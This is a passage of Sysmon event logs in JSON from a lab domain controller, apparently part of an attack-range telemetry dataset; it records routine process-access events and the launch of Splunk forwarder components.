{"EventTime":"2020-08-01 05:52:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5684,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:51.625\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:51.625","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5685,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:51.625\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:51.625","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5686,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:51.625\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:51.625","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5687,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:51.625\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:51.625","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5688,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:51.625\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:51.625","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5689,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:51.625\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:51.625","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5690,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:51.625\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0333-5F25-0000-001037C40A00}\r\nTargetProcessId: 4856\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:51.625","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0333-5F25-0000-001037C40A00}","TargetProcessId":"4856","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5691,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:51.766\r\nSourceProcessGUID: {A837DB8D-0333-5F25-0000-001037C40A00}\r\nSourceProcessId: 4856\r\nSourceThreadId: 4920\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:51.766","SourceProcessGUID":"{A837DB8D-0333-5F25-0000-001037C40A00}","SourceProcessId":"4856","SourceThreadId":"4920","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5692,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:52.363\r\nProcessGuid: {A837DB8D-0334-5F25-0000-00101AC60A00}\r\nProcessId: 1344\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Network monitor\r\nProduct: Splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-netmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 